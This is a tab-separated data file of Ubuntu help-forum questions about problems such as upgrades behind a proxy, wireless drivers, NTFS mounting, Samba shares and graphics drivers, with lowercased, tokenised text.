281445	upgrade failed- forbidden downloading	i use proxy to connect to the internet . i am trying to upgrade to 12.10 . the problem is that some ( nearly all ) packages are downloaded but some 3 mb data is not downloading , due to which the upgradation aborts reporting a forbidden error . these are some files related to gnome-games and facebook integration . facebook is blocked on the proxy server which i am using , so i guess the error appears due to that . i want to ask if there is any way i can skip downloading the last 3 mb packages ( which i do n't need ) so that my upgradation continues to ubuntu 12.10 ? this is the error i am getting : failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gnome-games/gnomine_3.6.0.2-0ubuntu1.2_i386.deb 403 forbidden failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gnome-games/mahjongg_3.6.0.2-0ubuntu1.2_all.deb 403 forbidden failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gnome-games/gnome-mahjongg_3.6.0.2-0ubuntu1.2_i386.deb 403 forbidden failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gnome-games/gnome-sudoku_3.6.0.2-0ubuntu1.2_all.deb 403 forbidden failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gnome-games/gnome-games-data_3.6.0.2-0ubuntu1.2_all.deb 403 forbidden failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/a/account-plugins/account-plugin-facebook_0.8-0ubuntu2_i386.deb 403 forbidden failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gwibber/gwibber-service-facebook_3.6.0-0ubuntu1.1_all.deb 403 forbidden
281446	hp pavilion 14 . wireless switch f12 , rfkill not working , can not connect to wireless at all	yesterday i installed ubuntu onto my hp pavilion 14 laptop ( running windows 8 ) , i uninstalled windows 8 because i hated it and put ubuntu on top of it . i downloaded it off of a disk a burned from my other laptop . i successfully installed the software and uninstalled windows 8 from the disk so now it runs off of my computer , but i am having a problem with wireless . in the top right hand corner no wireless choices come up , there are only three options there : enable networking connection information ( which is grayed out ) and edit connections ... i have been working on this issue since last night . i have another computer that i am writing this from , that i would be able to download anything onto then transfer it over from a flashdrive if needed . but i do n't have access to a wired connection on that computer because it was a cheaper computer and therefore does not have a wired ethernet plug . i am a noob to linux so be thorough with your here is the thing in the terminal i have tried typing rfkill list all sudo rfkill unblock wi-fi sudo rfkill unblock all and other commands like that , ( all the rfkill commands ) , as the tutorial suggests , but they do not give me any information , they just move on to the next line like i did not even type anything . it also does not tell me it does not understand the command though . but when i just type `` rfkill '' it pulls up the menu for the commands for rfkill . i am running a ralink rt3290 wi-fi adapter . i am open to any suggestions , but be extremely thorough as ( like i said ) i an a noob to linux . my wireless is controlled by a red/white light ( mounted to the f12 key ) that is red when the wireless is on and red when the wireless is off . this light has stayed red anytime i start ubuntu , my bios was not much with this , but i will try again for whatever people say . anytime i manually try and change the wi-fi light ( pressing f12 or fn and f12 ) , it is stuck . this key always worked fine on windows before i uninstalled it for ubuntu . i 'm open to any suggestions , but i just really want to be able to get online with this computer . wireless had always worked perfectly on windows 8 but i hated windows . now that i ca n't go back to windows i 'm committed to fixing the problem . i can use most programs in ubuntu well , except for the ones that require internet ! i 've been trying to fix this since i installed it , but nothing has seemed to work so i 'm coming here .
281450	ntfs mount locked after suspend	hopefully , i did n't miss this being asked by someone else , but i have an ntfs mount that gets locked up after i suspend my laptop . maybe it 's because the wifi has to reconnect after starting up again ? but , even then if i try to umount and mount the drive it 's still locked up . i 'm not sure where to even start looking into this one . anyone have some recommendations ?
281451	jpg batch compression & rename ( find -exec , xargs , piping ? )	this is my first post so i hope you 'll be kind enough to forgive me if i make some formatting mistakes or else . this is one question i 've had for quite some time and while looking for answers i have more questions arising . i was trying to find a way to compress pictures in a folder using convert in one command . first i simply tried : convert * -resize 50 % pic.jpg however this returned the compressed pictures named pic-0.jpg , pic-1.jpg , etc . ( i also tried $ ( find `` .jpg '' ) instead of * but this is expanded to the same . in order to have the formatting i wanted i tried : convert * -resize 50 % pic_lorez_ { 1..3 } .jpg but this seemed to take the pic_lorez_2.jpg and pic3_lorez_3.jpg as input files , not output files . so following the advice of a friend , i tried : find . -name `` *.jpg '' -exec convert { } -resize 50 % { } \ ; this compress all files under the same name but does n't allow to put the name i want to these files ( for example , pic_lorez_ { 1,2,3,4,5 , ..100 } .jpg ) . would xargs make it possible ? something along the lines of : find . -name `` *.jpg '' | xargs convert ? ? ? i could n't figure out the proper syntax with xargs . i finally tried a direct pipe of find into convert but convert did n't seem to be able to work that way .
281460	maya 2014 on ubuntu 12.04	i am facing big problem trying to successfully run maya 2014 on ubuntu . yesterday i successfully achieved that goal but today because of graphics driver issues i was forced to reinstall ubuntu because i messed up system with dodgy graphic drivers for intel gma but to the point . maya 2014 is made only for rpm based distros so you probably can imagine what i did at first place . alien of course successfully . installed generated debs . fixed som lib dependencies . i did exactly what i did yesterday but today it is just not working . for now i am installing opensuse alongside ubuntu and windows because i just spend loads of time trying to make maya run on ubuntu . but anyway i am trying to find better solutions to install maya on ubuntu . so if anybody achieved that can you please share the sstep by step solution for this case ? i like ubuntu and i dont want to migrate to opensuse just because of maya not being made for debian distros . it is shame that they do n't made debian package . it is n't so hard to do if i spend half a day to figure out how to run it on debian distro since its linux . loads of people migrate to linux because of its open source tag and i see that first choice is mostly ubuntu .i have an experience with opensuse but i just stuck with ubuntu for long time so going back to opensuse is for me pain but this is my only solution for now . anyway if somebody can help please help . loads of people are looking for solution . internet is flooded with loads of buggy `` easy install maya scripts '' for ubuntu and i rather prefer using step by step guide than using scripts that are obsolete at the moment . problems in running maya sits in shared object libraries . thats the main problem that terminal output gave me . /maya.bin : error while loading shared libraries : libfam.so.0 : can not open shared object file : no such file or directory this is what i 've got
281466	samba : how can i access a share on a virtualbox guest ( in nat mode )	my os : windows 8 virtualbox guest : ubuntu 12.10 server i configured apache server on vbox guest and mapped http , https , ssh port successfully into ubuntu server . it works nice without any problem . my network card is in nat mode . after some research i installed samba on guest system . i need to map /var/www/ folder on windows 8 so that i can work directly inside guest server from windows . here is my smb.conf [ share ] comment = `` vbox server share '' path = / writable = yes read only =no browseable = yes force directory mode = 777 force create mode = 777 force security mode = 777 force directory security mode = 777 hide dot files = no create mask = 0777 directory mask = 0777 valid users = @ users , tural , root delete readonly = yes guest ok = yes workgroup = workgroup i know that mapping works when networking is in bridged mode , but i do n't want to make my vbox server visible to network . also i confgured windows hosts file and mapped port 80 with vbox nat so that , when i open some domain that redirected into localhost on windows , it gets data from virtualbox webserver . if do bridged , i will not be able to open guest webserver is there any other way to make drive mapping possible with nat or something else ?
281473	is netflix-desktop down for everyone ?	netflix-desktop is n't working currently . every time i select a movie to play i get asked if i would like to install silverlight . i believe firefox updated itself but am not sure . i did apt-get remove netflix-desktop -- purge and then apt-get install netflix-desktop it still asks if i would like to install silverlight to watch my movie when i click on it .
281474	i ca n't watch some videos in fullscreen with gnome 3	when i try to watch videos in fullscreen with my webbrowser , it does n't matter wether firefox or chrome , only at some video sites the whole panel disappears , sometimes the panel does not disappear , and sometimes half of the activities button stays there .
281476	is the installation hang-up for pc with multiple harddrive and partitions present in 12.10 is fixed in 13.04 ?	i pc has 3 hard drive with several partition in each drives ? in 12.10 the installation crashes right after you click next on the 1st language selection box . it looks like parted or something related failed . i heard this does not happen if you have only 1 hard drive . hoping they will fix it in 13.04 .
281478	fan speed in ubuntu : pwmconfig no pwm-capable sensor modules installed	i followed this guide about how to control fan speed in ubuntu , but it does n't work with my laptop ( dell inspiron 15r ) . i installed lm-sensors and fancontrol packages . then i configured lm-sensors by typing : sudo sensors-detect and i answered yes to all questions . at the end i had this message : driver coretemp ' : * chipintel digital thermal sensor ' ( confidence : 9 ) to load everything that is needed , add this to /etc/modules : -- -- cut here -- -- # chip drivers coretemp -- -- cut here -- -- i added the suggested lines to /etc/modules . i rebooted my laptop . now the problem : when i try to configure fancontrol typing : sudo pwmconfig i get an error : /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed i spent most of the day looking for a solution but i had no luck . what should i do now ?
281482	why are youtube videos not playing properly on chrome ?	i 've had ubuntu for quite some time now and youtube and everything has worked spectacular ! but all of a sudden recently youtube videos have stopped working right . the sound works perfectly , but the video is super slow and does n't show correctly , as in the video does n't move , just goes from picture to picture . i 've looked everywhere for help and have not found a reason why it 's doing this . youtube works fine on firefox but on chrome it does this . chrome 's my main browser , and we use it in school all the time . i 've tried the flash player settings and unchecking the hardware acceleration box , but that did n't even work . any thoughts or solutions ? i have ubuntu 12.04 lts , os 64-bit on a chromebook .
281483	ca n't start ubuntu 12.10	i just installed ubuntu 12.10 on my asus 1025c , and when the installation finished , usually it restarts , but suddenly it displays a purple screen and the screen turns off , but the computer is still working . i ca n't do anything , because the screen is always off . any help ?
281484	unable to make files executable ( on ntfs filesystem mounted as rw )	i 'm baffled . i 've looked around for awhile on this but nobody seems to have quite the issue i do . i have an ntfs partition for all of my stuff , and i want to run some programs off of it . however , i keep getting permission denied . very well , i 'll try sudo ./eclipse . nope . okay , well , maybe i have to chmod . sudo chmod +x eclipse . no error . ls -l. eclipse is still -rw -- -- -- - . what ? verbose output ! sudo chmod -v +x eclipse result : mode of 'eclipse ' changed from 0600 ( rw -- -- -- - ) to 0711 ( rwx -- x -- x ) yay ! nope , ls -l reveals that it 's still -rw -- -- -- - . i then open nautilus as root , and find the file , and try to do it from the gui . turns out the same thing happens . the `` allow executing file as program '' option is n't disabled , but when i tick the box it unticks the moment my mouse leaves . what 's going on ? mount reveals that this partition is mounted in rw mode , which i know is important . fstab line is uuid= '' 755af93248acabd6 '' /s ntfs rw , auto , users , nls=utf8 , umask=007 , gid=46 0 0
281487	will ubuntu work after my windows 7 be inactivated ?	i have windows 7 home premium currently installed in my laptop . which is going to inactivate in next 20 days . my question is if i do partition in c drive and than install ubuntu with flash drive . do i am able to use ubuntu os after my windows 7 inactive after 20 days ?
281491	ca n't log in after password change ( ecryptfs )	i am on ubuntu 12.10 with one user using encrypted home . a while back i have changed by user password and then forgot it . i then made a backup of my files using dustin 's help to an external drive . i was about to delete my system and do a fresh install when i realized that there is a recovery option in which i can reset my user password . using how do i reset a lost administrative password ? i have set a new password for my user . after rebooting i can log-in in unity using my new password but i am thrown back to the unity screen immediately . ( no message about false password ) using the terminal i can log in using the new user-password . how can i re-enable my machine to decrypt my ecrypfs encrypted home with the unwrapped passphrase i know ?
281495	how should i set up a fqdn and intranet sandbox 12.10 server that wo n't be public	am trying to install virtualmin and it does n't like the hostname as the fqdn . when doing the ubuntu install i called it blahblah-vps . the virtualmin script trips over that and asks me for a fqdn . since this machine is mostly a sandbox and will not be public to the outside , not sure what my /etc/hosts and /etc/hostname files should have in them . /etc/hosts as follows : 127.0.0.1 localhost 127.0.1.1 blahblah-vps # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters 192.168.0.2 blahblahblah.is-a-geek.com /etc/hostname as follows : blahblah-vps there is some commentary regarding how the fqdn is a critical aspect of the virtualmin install .
281502	libreoffice : how to save themes of a presentation to use them in another ?	i downloaded presentations with nice themes i would like to use myself . the only way i found was to delete all the content and write my own . is n't there a better solution than this one ?
281506	restore root.disk files ( or boot in low-graphics mode )	once something bad happend and my ubuntu has falled down . after this when booting i have message `` you are in low-graphics mode now , your screen and other devices ca n't be detected automaticly . you have to configure it manually '' , then i press enter key and get next window where 4 options like `` log in low-graphics mode '' etc . and nothing happends and nothing works . all i can do is shut down the system . no mouse , no keyboard works ( i guess ) . so i ca n't boot . actually i need files from my home directory , it 's only reason stops me to reinstall ubuntu . how can i log in or get files from root.disk ( i also have windows 7 on my computer )
281507	how to set unique folders for several e-mail accounts ?	i 'm using more and more e-mail lately and i would like to put some order into that . the thing is that i have two different accounts ( yahoo and google ) . i created a folder in thunderbird for my gmail account named `` work '' . i have received a mail on my yahoo account that is about work . when i put this e-mail into the folder then it is moved to my gmail account , visible from gmail.com i would like to have a unique folder where i put everything related to work but that dispatch the mails following the accounts they are from . a mail received about work in gmail and another one in yahoo would appear in the same folder in thunderbird but would appear in their respective work folder in yahoo.com and gmail.com . more than how ... is it possible ?
281508	ca n't boot ubuntu 12.10 graphics problem	i ca n't boot since installing ubuntu 12.10 when i try to run ubuntu my computer never gets to the ubuntu screen with the loading dots . i tried to run in recovery mode with safe graphics ( failsafex ) when i do this a message pops up saying `` the system is running in low graphics mode '' , if i click okay i am asked what would i like to do and am given four options . i tried running low graphics for one session and then a message appears with a progress bar and says standby one minute while the display restarts . the progress bar never moves and if i click okay the whole process just restarts . i do n't know what to do from here i ca n't get into the os . i 'm not sure whether the problem is related to compatibility with my laptop monitor or my graphic card nvidia360m i had to install using a safe graphics mode . to learn about how i installed see this link . this link also has information on my computer hardware . ca n't install ubuntu since 10.10 -- -- update -- - i was able to get into a desktop environment by installing nvidia-current however it is messy . i have a screen and i am able to see my desktop however there is no unity bar and none of the keyboard controls work . i can right click and create a folder on the desktop and then i can see inside that folder in a traditional browser window . there is still no top menu or unity bar . when i boot normally i do n't get into the desktop environment and i get this message in tty 'gpu lockup switching to software fbcon' okay , i 've played around with tips the pages from comments . i 've been able to consistantly get into a safemode desktop environment using the xorg & nouveau drivers . i 've tried switching between the 5 different options in the additional drivers tab in software sources . the nvidia ( proprietary , tested ) driver gets beyond the gpu lockup on a normal boot and actually gets into a desktop . the issue is then that there is no unity bar , or top screen menu bar and the resolution is very low . i 've tried switching to the ( prop , tested ) driver and then reinstalling unity and ubuntu-desktop but that did n't work either .
281509	how do i change the screen resolution using ubuntu command line ?	i installed ubuntu and the resolution of the desktop is so big it only shows about 50 % of the screen but is shows up normal while using command line . what would i type in the command line to change the desktop screen resolution ?
281510	can installing lubuntu desktop interfere with my win7 audio output ?	after i went on ubuntu today , and installed lubuntu desktop environment , i just re-booted into windows 7 and found out that my audio mini-jack output is n't working anymore . can that be linked to the lubuntu desktop install ? do someone know how the two systems might interfere with each other ?
281513	monodevelop mvc development adding a view	i am building an mvc project on monodevelop , but i am having difficulties adding a view . when i click on the add view button , i encounter an error . i think this error is already known by the monodevelop team as i found a ticket associated to this error here : https : //bugzilla.xamarin.com/show_bug.cgi ? id=6036 my questions are : is this error fixed ? i am using monodevelop 3.0.3.2 , which i installed on ubuntu 12.10 using apt-get install monodevelopi attempted to update the version , but i 'm not sure if its either up to date or if there is something about installing it in this manner . is there a work-around for this ?
281514	access lenovo ideapad ( z580 ) bios with ubuntu installed	ubuntu seems to block my access to the bios of my system . i know this for sure since this problem occur only since i installed ubuntu ( 12.10 ) . while the system is booting , pressing f2 leads me to grub . how may i access my bios ?
281515	how do i modify libre office launcher 's icon right-click menu on ubuntu 13.04 ?	upon right-click libre office unity launcher icon shows only two items : to open libre office itself ( i.e . its main menu ) or to unpin the icon from launcher . i want libre office icon in my unity bar to present several options on right-click , e.g . 'open write ' , 'open calc ' , etc. , similar to files launcher icon which allows to open various folders upon right-click . is it possible to modify libre office unity launcher 's right-click menu to list all office applications ? edit : thanks to the help provided by @ user852994 and especially this link to ubuntu documentation i finally managed to piece together launcher code that works for me on 13.04 : [ desktop entry ] version=1.0 terminal=false icon=libreoffice-startcenter type=application categories=office ; x-red-hat-base ; x-suse-core-office ; x-mandrivalinux-office-other ; exec=libreoffice % u mimetype=application/vnd.openofficeorg.extension ; name=libreoffice genericname=office comment=edit/create documents actions=writer ; calc ; impress ; draw [ desktop action writer ] name=writer exec=libreoffice -- writer % u onlyshowin=unity ; [ desktop action calc ] name=calc exec=libreoffice -- calc % u onlyshowin=unity ; [ desktop action impress ] name=impress exec=libreoffice -- impress % u onlyshowin=unity ; [ desktop action draw ] name=draw exec=libreoffice -- draw % u onlyshowin=unity ;
281519	will using the same steam game library folder on both windows 7 and ubuntu 12.04 create conflicts ?	i have steam installed on win7 in d : \games\pc\steam . i installed steam on my ubuntu now and for half-life 2 : deatmatch it asked wether to install in the default folder or somewhere else . i chose the same folder as for windows to avoid having games doubled , on ubuntu it 's /media/media/games/pc/steam . it did n't download anything and was instantly ready to play . when i chose to install team fortress 2 it did n't ask me where to install . i read that some games , like tf2 , can be installed only in the default game library folder . will those that are installed in the same folder as the windows steam is create any conflicts ? thanks in advance .
281520	how can i delete my printer from ubuntu ?	using 12.04 my printer a canon ip2600 will not print . systemsettings/printers shows it as installed , connected to local host , enabled , accepting jobs , shared and allowing printing for everyone . yet it does not print . i have tried to remove it but get a request for user name and password which i enter ( i only have one password ) but the password is listed as incorrect . i need a sudo command which i can use to delete the printer so i can attempt to re-install it . as it is the printer is useless and i can not even uninstall it .
281524	how to create a user that has full rights under sftp in certain folder in ubuntu server	i just installed an ubuntu 12.04 server in a dedicated box to host 2 sites i have , under one site there is a folder , lets call it /aaaaa and i want to create a user that have full rights under this certain folder via sftp . the path of that folder is /var/www/domain.com/aaaaa
281525	how do i use wireless on the presario v5000	i have an old compaq presario v5000 on which i installed ubuntu 12.10 . it does not recognize or activate the wireless card . i was hoping that this latest version would finally provide some workaround for the broadcom wireless card problem .
281527	how to change resolution in ubuntu 12.04 lts	i 've got a monitor which has a resolution of 1920x1280 , but i ca n't enlarge it any more than 1024x768 . so everything is a bit too large . how can i change the resolution in my case ? i tried in terminal with xrndr too .
281528	problem installing ati driver 13.3 beta on ubuntu precise 12.04	os : ubuntu precise 12.04 lts 64 bit kernel : 3.5.0-27-generic header files : dpkg -s linux-headers- $ ( uname -r ) package : linux-headers-3.5.0-27-generic status : install ok installed deb packages build successfully via : sudo sh amd-driver-installer-catalyst-13.3-beta3-linux-x86.x86_64.run -- buildpkg ubuntu/precise but when i try to install sudo apt-get install fglrx*.deb i see it is unable to find linux header files . dpkg : dependency problems prevent configuration of fglrx : fglrx depends on linux-headers-generic | linux-headers ; however : package linux-headers-generic is not installed . package linux-headers is not installed . it seems it is looking for 3.2.x kernel header files which are default for 12.04 how to resolve this issue ?
281530	how do i run juju on a local server ?	i 'd like to use juju on my server at home to get to know juju and play with it . i have multiple computers and would like to access what 's on the server from any of them . when i went through the tutorial it setup juju okay , but only exposed the services to the local machine . i want to expose them to the whole network . how can i do this ? note : my server already exists and is running 12.04 , i do n't want to reinstall it using maas just to get juju working . i also do n't want to run this `` in the cloud '' on ec2 or any other provider because i want to try this out on my own machine under my control on my network . edit : - no firewall no blocking , all ports open yes . all computers on the lan ( 192.168.1.0/24 ) can see the server ( homeserver.local ) on 192.168.1.2 pretty standard wired and wifi with one dhcp server dishing out ip addresses in the above range setup correctly ( just started again from scratch ) and followed tutorial luis directed me to , here 's the results : - http : //paste.ubuntu.com/5714640/ juju status showed above . so , all running okay , but the main issue is that the containers have ip addresses locally assigned on the server , which are only accessible on the server itself . while i could go around setting up ssh port forwarding all over the place to access the 10.x ip addresses from the 192.168.1.0/24 range , this seems overcomplicated and unnecessary . i 'd like the containers exposed over my lan .
281540	python preferences on eclipse	i 'm using ubuntu 12.04 ive installed eclipse and downloaded python for it but when i go into the preferences i can not find python i am a complete beginner at this even with commands in ubuntu terminal i can do very little but i 'm slowly learning finally fixed this by uninstalling python from ecplise then running ecplipse via command line as root updated eclipse then reinstalled python
281541	how to install perrix gaming mouse on ubuntu ?	when i put my gaming mouse into the usb slot the light comes on but my cursor wo n't move and the buttons wo n't work . i stupidly threw away the cd that came with the mouse but they have the program available on the website and so i downloaded it and when i click on it , it just open as a file and not a executable program . what can i do ?
281542	upgrade to ubuntu 12.10	when trying to upgrade from ubuntu 12.04 to 12.10 through the update manager , it says there are no updates to install .
281547	rsync option that preserves both link to the directory and directory itself	is there an option in rsync to copy the link and at the same time copy the directory the link points to while preserving the link ? example command : rsync -arv -- delete /var remote : /backup/ where var2 is a link to /var2 inside /var directory with above command var2 is copied as link and /var2 directory never gets copied . i want both link and the /var2 be copied without specifying var2 as source directory .
281557	ubuntu 13.04 daily wo n't boot at all in upstream virtualbox	i managed to use unity ( slowly ) and then installed lubuntu . i restarted the machine and now i ca n't get x to load on tty7 . i can switch to login terminals though . jockey-text tells me that i am using the kmod : vboxguest . i installed nvidia-common and tried to set it as default using jockey-text but jockey-text only detects the kmod driver . i was going to report this on launchpad but i do n't think i understand about drivers in virtualbox fully ... can someone explain how to install and make default the nvidia-common driver in ubuntu 13.04 daily in virtualbox ? system specifications : guest ram : ~1.5gb intel pentium m dual-core @ 2.5ghz nvidia geforce 7050 update 1 : i rebooted and now i get [ ok ] in the top right with a flashing cursor . update 2 : found this . ( yahoo answers post from 4 years ago that says that the virtual machine ca n't use things on your motherboard . hmm ) . update 3 : fixed , just typed sudo lightdm in tty1 and that seemed to start it . ( facepalm ) update 4 : ... or not ... tried 'sudo lightdm ' and it just came up with a load of text ending in [ ok ] on tty7 . restarted and now it wo n't boot at all . note : i was going to answer myself but could n't ( due to a low rep cooldown ) and now it still does n't work .
281562	'mount -t ntfs-3g ' fails ( exit code 1 ) but 'ntfs-3g ' succeeds	i 'm currently on 12.04lts and i 've installed a couple of updates . ( not sure which ) now my nautilus can not mount any ntfs partition ( complaining about exit code 1 ) , and indeed sudo mount -t ntfs-3g /dev/sda3 /media/data ; echo $ ? prints 1 . ( /dev/sda3 is an ntfs partition ) . but stranger still , by invoking ntfs-3g /dev/sda3 /media/data i could get it mounted and then used normally ( in either case , of course , i create /media/data manually ) . man ntfs-3g tells me these two should be kind of aliases so i 'm not sure why . what i 've tried installing whatever updates available . ( nope , it does n't work . probably because the system 's /etc has once been recovered from an older backup ) ntfs-config . no it does n't work . it adds entries to /etc/fstab but then i 've been forced to skip mounting it when booting . dpkg-reconfigure ntfs-3g . i tried all 4 combinations ( yy , ny , yn , nn ) for the two questions available during the procedure and i rebooted my pc each time i experimented . not work . yeah , i could 've set up a startup script to use ntfs-3g to mount my drives . my strace for mount -t ntfs-3g execve ( `` /bin/mount '' , [ `` mount '' , `` -t '' , `` ntfs-3g '' , `` /dev/sda5 '' , `` /media/data '' ] , [ /* 27 vars */ ] ) = 0 brk ( 0 ) = 0x96f5000 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) mmap2 ( null , 8192 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0xb779c000 access ( `` /etc/ld.so.preload '' , r_ok ) = -1 enoent ( no such file or directory ) open ( `` /etc/ld.so.cache '' , o_rdonly|o_cloexec ) = 3 fstat64 ( 3 , { st_mode=s_ifreg|0644 , st_size=141237 , ... } ) = 0 mmap2 ( null , 141237 , prot_read , map_private , 3 , 0 ) = 0xb7779000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/i386-linux-gnu/libblkid.so.1 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p8\0\0004\0\0\0 '' ... , 512 ) = 512 fstat64 ( 3 , { st_mode=s_ifreg|0644 , st_size=162044 , ... } ) = 0 mmap2 ( null , 164784 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0xb7750000 mmap2 ( 0xb7776000 , 12288 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x25 ) = 0xb7776000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/i386-linux-gnu/libmount.so.1 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`c\0\0004\0\0\0 '' ... , 512 ) = 512 fstat64 ( 3 , { st_mode=s_ifreg|0644 , st_size=157544 , ... } ) = 0 mmap2 ( null , 160260 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0xb7728000 mmap2 ( 0xb774e000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x25 ) = 0xb774e000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/i386-linux-gnu/libselinux.so.1 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0 @ a\0\0004\0\0\0 '' ... , 512 ) = 512 fstat64 ( 3 , { st_mode=s_ifreg|0644 , st_size=120748 , ... } ) = 0 mmap2 ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0xb7727000 mmap2 ( null , 125852 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0xb7708000 mmap2 ( 0xb7725000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x1c ) = 0xb7725000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/i386-linux-gnu/libc.so.6 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\226\1\0004\0\0\0 '' ... , 512 ) = 512 fstat64 ( 3 , { st_mode=s_ifreg|0755 , st_size=1730024 , ... } ) = 0 mmap2 ( null , 1743580 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0xb755e000 mprotect ( 0xb7701000 , 4096 , prot_none ) = 0 mmap2 ( 0xb7702000 , 12288 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x1a3 ) = 0xb7702000 mmap2 ( 0xb7705000 , 10972 , prot_read|prot_write , map_private|map_fixed|map_anonymous , -1 , 0 ) = 0xb7705000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/i386-linux-gnu/libuuid.so.1 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260\17\0\0004\0\0\0 '' ... , 512 ) = 512 fstat64 ( 3 , { st_mode=s_ifreg|0644 , st_size=18012 , ... } ) = 0 mmap2 ( null , 20700 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0xb7558000 mmap2 ( 0xb755c000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x3 ) = 0xb755c000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/i386-linux-gnu/libdl.so.2 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`\n\0\0004\0\0\0 '' ... , 512 ) = 512 fstat64 ( 3 , { st_mode=s_ifreg|0644 , st_size=13940 , ... } ) = 0 mmap2 ( null , 16504 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0xb7553000 mmap2 ( 0xb7556000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x2 ) = 0xb7556000 close ( 3 ) = 0 mmap2 ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0xb7552000 mmap2 ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0xb7551000 set_thread_area ( { entry_number : -1 - > 6 , base_addr:0xb7551780 , limit:1048575 , seg_32bit:1 , contents:0 , read_exec_only:0 , limit_in_pages:1 , seg_not_present:0 , useable:1 } ) = 0 mprotect ( 0xb7702000 , 8192 , prot_read ) = 0 mprotect ( 0xb7556000 , 4096 , prot_read ) = 0 mprotect ( 0xb755c000 , 4096 , prot_read ) = 0 mprotect ( 0xb7725000 , 4096 , prot_read ) = 0 mprotect ( 0xb7776000 , 8192 , prot_read ) = 0 mprotect ( 0xb774e000 , 4096 , prot_read ) = 0 mprotect ( 0x805d000 , 4096 , prot_read ) = 0 mprotect ( 0xb77bf000 , 4096 , prot_read ) = 0 munmap ( 0xb7779000 , 141237 ) = 0 statfs64 ( `` /selinux '' , 84 , { f_type= '' ext2_super_magic '' , f_bsize=4096 , f_blocks=7211656 , f_bfree=3093320 , f_bavail=2731836 , f_files=1810432 , f_ffree=1623318 , f_fsid= { 85910847 , -1799323758 } , f_namelen=255 , f_frsize=4096 } ) = 0 brk ( 0 ) = 0x96f5000 brk ( 0x9716000 ) = 0x9716000 open ( `` /proc/filesystems '' , o_rdonly|o_largefile ) = 3 fstat64 ( 3 , { st_mode=s_ifreg|0444 , st_size=0 , ... } ) = 0 mmap2 ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0xb779b000 read ( 3 , `` nodev\tsysfs\nnodev\trootfs\nnodev\tb '' ... , 1024 ) = 322 read ( 3 , `` '' , 1024 ) = 0 close ( 3 ) = 0 munmap ( 0xb779b000 , 4096 ) = 0 open ( `` /usr/lib/locale/locale-archive '' , o_rdonly|o_largefile|o_cloexec ) = 3 fstat64 ( 3 , { st_mode=s_ifreg|0644 , st_size=10411536 , ... } ) = 0 mmap2 ( null , 2097152 , prot_read , map_private , 3 , 0 ) = 0xb7351000 mmap2 ( null , 8192 , prot_read , map_private , 3 , 0x434 ) = 0xb779a000 mmap2 ( null , 1716224 , prot_read , map_private , 3 , 0x714 ) = 0xb71ae000 close ( 3 ) = 0 open ( `` /usr/lib/locale/locale-archive '' , o_rdonly|o_largefile|o_cloexec ) = 3 fstat64 ( 3 , { st_mode=s_ifreg|0644 , st_size=10411536 , ... } ) = 0 mmap2 ( null , 4096 , prot_read , map_private , 3 , 0x2a1 ) = 0xb71ad000 mmap2 ( null , 1503232 , prot_read , map_private , 3 , 0x5a5 ) = 0xb703e000 close ( 3 ) = 0 umask ( 022 ) = 022 open ( `` /dev/null '' , o_rdwr|o_largefile ) = 3 close ( 3 ) = 0 getuid32 ( ) = 0 